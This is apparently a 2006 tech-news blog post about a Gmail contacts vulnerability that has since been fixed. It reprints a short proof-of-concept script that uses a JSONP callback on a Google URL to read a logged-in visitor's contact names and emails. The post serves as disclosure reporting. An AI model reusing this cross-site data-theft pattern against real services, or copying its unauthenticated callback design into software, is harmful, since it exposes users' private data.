Business

Serious Gmail vulnerability fixed

After posting my last article about the contacts "JSON API", Haochi Chen discovered that by simply appending a "callback" variable in the URL, the creators of a malicious site could gain access to a visitors entire Gmail contact list without warning.<script language="javascript"> function getContacts(response){ var output = ""; for(x=0;x<response.

Written by Garett Rogers, Inactive Dec. 31, 2006 at 11:55 a.m. PT

<script language="javascript">
     function getContacts(response){
       var output = "";
       for(x=0;x<response.Body.Contacts.length;x++){
         output += response.Body.Contacts[x].Name + " <" + response.Body.Contacts[x].Email + "> ";
       }
       alert(output);
     }
</script>
<script language="javascript" xsrc="http://video.google.com/data/contacts?out=js&max=500 &psort=Affinity&callback=getContacts">
</script>

This sample script once proudly displayed the visitors contact list if they were logged into their Google account. Only hours after it was reported to the Google security team, the vulnerability was fixed.

"Thanks for reporting this to us. We have identified and fixed the problem" -- Google Security

It's a little concerning that this problem even existed, but knowing the fix was made only hours after it was reported does warrant some level of reassurance.

Update:
The problem is only partially fixed. The vulnerability exposed through video.google.com has been patched up, but there are other subdomains where the problem still exists.

Editorial standards

Show Comments

Serious Gmail vulnerability fixed

Related

Not into the Tesla Powerwall? You can now buy the Anker Solix X1

The Jackery Explorer 1000 is one of the best portable power stations you can buy, and it's on sale

Can Meta AI code? I tested it against Llama, Gemini, and ChatGPT - it wasn't even close